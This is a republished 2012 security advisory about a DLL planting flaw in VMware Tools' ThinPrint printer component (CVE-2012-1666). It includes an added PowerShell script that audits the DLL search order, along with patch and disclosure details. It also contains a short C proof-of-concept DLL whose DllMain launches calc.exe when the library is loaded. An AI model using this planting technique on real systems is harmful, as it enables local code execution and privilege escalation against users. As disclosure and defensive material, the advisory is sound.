VMWare Tools Binary Planting

2012-09-05 00:00:00
Moshe Zioni
packetstormsecurity.com
EPSS: 0.001 (Low), percentile 25.2%

Security Advisory - VMWare Tools susceptible to binary planting by hijack  
=========================================================================  
Summary : VMWare Tools susceptible to binary planting  
Date : 4 September 2012  
Affected versions : Product versions prior to -  
Workstation 8.0.4  
Player 4.0.4  
Fusion 4.1.2  
View 5.1  
ESX 5.0 P03  
ESX 4.1 U3  
Not affected: ESX 4.0, ESX 3.5  
CVE reference : CVE-2012-1666  
  
Details  
================  
VMWare Tools handles many functions involved in host-guest interactivity,  
providing a richer environment for end-users and server administrators alike.  
Part of VMWare Tools' responsibilities is handling printer services through the host;  
this is delegated to a third-party component that VMware acquired (ThinPrint).  
  
During initialization, which happens at several points throughout printer  
communication negotiation, the component attempts to load a dynamic-link  
library that does not exist on the system, using an unqualified (path-less)  
load of 'tpfc.dll'. The loader therefore walks the standard DLL search order.  
  
A user with local disk access can carefully construct a DLL matching that  
name and place it somewhere along the search path traversed by the client,  
and the client will load it seamlessly.  
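
An added audit script for defenders, not part of the original advisory: it walks the SafeDllSearchMode order that an unqualified load of 'tpfc.dll' would follow for a given executable and reports any copy of the DLL that is present (there should be none, since the library legitimately does not exist) together with search-order directories writable by low-privilege groups. The VMware Tools install directory is an assumption; adjust it to the host being audited.

```powershell
# Added audit script (not from the advisory). Reports where an unqualified
# LoadLibrary("tpfc.dll") would resolve and which search-order directories
# low-privilege accounts can write to.
param(
    [string]$DllName = 'tpfc.dll',
    # Assumed install directory of the VMware Tools / ThinPrint client.
    [string]$AppDir  = "$env:ProgramFiles\VMware\VMware Tools"
)

$sys = [Environment]::SystemDirectory          # e.g. C:\Windows\System32
$win = $env:SystemRoot
# SafeDllSearchMode order (default since Windows XP SP2): application dir,
# System32, 16-bit System dir, Windows dir, current dir, then PATH entries.
$order = @($AppDir, $sys, (Join-Path $win 'System'), $win, (Get-Location).Path) +
         ($env:Path -split ';' | Where-Object { $_ -ne '' })

# Identities whose write access makes a directory a planting location.
$lowPriv = 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone',
           'NT AUTHORITY\INTERACTIVE'
# CreateFiles (WriteData) is the right needed to drop a DLL; Modify and
# FullControl both include this bit, so a single mask covers them.
$writeMask = [System.Security.AccessControl.FileSystemRights]::CreateFiles

$i = 0
foreach ($dir in $order) {
    $i++
    if (-not (Test-Path -LiteralPath $dir)) { continue }
    $found = Test-Path -LiteralPath (Join-Path $dir $DllName) -PathType Leaf
    $writable = $false
    try {
        foreach ($ace in (Get-Acl -LiteralPath $dir).Access) {
            if ($ace.AccessControlType -eq 'Allow' -and
                $lowPriv -contains $ace.IdentityReference.Value -and
                ($ace.FileSystemRights -band $writeMask)) { $writable = $true }
        }
    } catch { }   # unreadable ACL: report as not writable, review manually
    [pscustomobject]@{
        Order           = $i
        Directory       = $dir
        DllPresent      = $found
        LowPrivWritable = $writable
    }
}
```

Any row with DllPresent set is an immediate finding on an unpatched host; rows with LowPrivWritable set are the locations where such a file could be planted and are worth tightening regardless of patch status.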
  
Impact  
================  
Once the DLL has been planted, an unsuspecting user who runs printer  
services, for example, will cause it to load, resulting in arbitrary code  
execution at that user's privilege level.  
  
This attack vector is mainly used in local privilege escalation scenarios and  
user credential harvesting, and can be used by malware to disguise itself,  
amongst other uses.  
  
Proof of Concept  
================  
  
```c
#include <windows.h>

/* Payload run when the planted DLL is loaded: starts calc.exe as a visible
 * sign that code executed inside the loading process. */
int hijack_poc(void)
{
    WinExec("calc.exe", SW_NORMAL);
    return 0;
}

/* Entry point invoked by the loader once the unqualified search for
 * tpfc.dll resolves to this file. As in the original PoC, the payload runs
 * on every notification reason and DllMain returns FALSE afterwards. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved)
{
    (void)hinstDLL; (void)dwReason; (void)lpvReserved;
    hijack_poc();
    return 0;
}
```
  
Solution  
================  
Official patches have been released by the vendor and can be obtained from www.vmware.com  
  
Credits  
================  
The issue was responsibly reported by Moshe Zioni from Comsec Global Consulting.  
  
Timeline  
=================  
4 September 2012  
Security advisory released by Comsec Consulting  
31 August 2012  
Vendor finished deploying fixes to products; release notes published  
13 March 2012  
Vendor started to implement fixes to products  
14 February 2012  
First response from vendor  
13 February 2012  
Bug reported by Moshe Zioni from Comsec Global Consulting  
to VMWare and the third-party printer driver developers simultaneously  
  
References  
=================  
VMWare  
http://www.vmware.com  
Release notes  
https://www.vmware.com/support/vsphere4/doc/vsp_esxi41_u3_rel_notes.html#resolvedissuessecurity  
  
Comsec Global Consulting  
http://www.comsecglobal.com/  